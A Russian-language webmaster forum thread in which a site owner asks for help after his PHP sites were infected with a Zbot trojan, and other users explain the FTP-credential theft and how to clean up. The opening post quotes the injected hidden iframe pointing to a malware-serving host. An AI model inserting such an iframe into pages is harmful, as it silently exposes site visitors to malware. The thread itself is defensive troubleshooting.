помогите победить вирус (HTTP-объект)

Жан
На сайте с 05.04.2007
Offline
97
1041

Всем привет!

Сегодня на своем сайте Касперкий выловил такого зверя

Вредоносный HTTP-объект <http://lowergt.com/iz/exe.php>: обнаружено: троянская программа 'Trojan-Spy.Win32.Zbot.no'.

смотрю код после и вижу после </html>

<iframe src='http://lowergt.com/iz/index.php' width='0' height='15 style='display:none'></iframe>

Сайты на PHP и если открываю на локальном компе, то то его нет.

Т.е. генерится вместе со страничкой.

Дизайнер успел залезть на FTP и заразил еще два сайта :eek:

Не знаю как побороть. Кто сталкивался с этим вирусом посоветуйте

буду благодарен.

Заранее спасибо за помощь.

W
На сайте с 07.11.2007
Offline
5
#1

Было у меня такое. Поробуйте почистить комп, с которого осуществляется FTP-доступ, затем смените реквизиты FTP-доступа. Удалите все зараженные файлы с сервера и залейте чистые. (только именно удалите, а потом залейте. Без перезаписи файлов!)

Удачи!

O
На сайте с 11.05.2005
Offline
172
#2

И после этого перестанвайте хранить пароли к ftp в компьютере, в разных клиентах. Вводите только во время сессий, не сохраняя.

vlasoff
На сайте с 31.08.2007
Offline
101
#3

При попадании на компьютер вирус ворует логин/пароля для доступа к FTP сайта и отправляет его на некоторый сайт, далее, имея IP с логином и паролем вирус вирус дописывает этот код к страницам по списку, чтобы заражать других. Т.е. чтобы его победить надо во-первых поменять пароль для доступа к ФТП и при этом НЕ СОХРАНЯТЬ его в ФТП-клиенте (часто это Тотал Коммандер), ну и во-вторых собственно убрать код из страниц.

Жан
На сайте с 05.04.2007
Offline
97
#4
vlasoff:
При попадании на компьютер вирус ворует логин/пароля для доступа к FTP сайта и отправляет его на некоторый сайт, далее, имея IP с логином и паролем вирус вирус дописывает этот код к страницам по списку, чтобы заражать других. Т.е. чтобы его победить надо во-первых поменять пароль для доступа к ФТП и при этом НЕ СОХРАНЯТЬ его в ФТП-клиенте (часто это Тотал Коммандер), ну и во-вторых собственно убрать код из страниц.

Спасибо. FTP поменял скачал к себе на диск проверяю Касперским вирус не находит 😒

А код виден только при генерации страниц как его удалить?

O
На сайте с 11.05.2005
Offline
172
#5
Жан:
А код виден только при генерации страниц как его удалить?

Страницы статические - просто замените. CMS - ищите файлы с именем index.*, deafault.* и head.* - и редактируйте их.

Жан
На сайте с 05.04.2007
Offline
97
#6
Opeth:
Страницы статические - просто замените. CMS - ищите файлы с именем index.*, deafault.* и head.* - и редактируйте их.

Большое спасибо справился.

всем отозвавшимся огромное спасибо за помошь.:)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий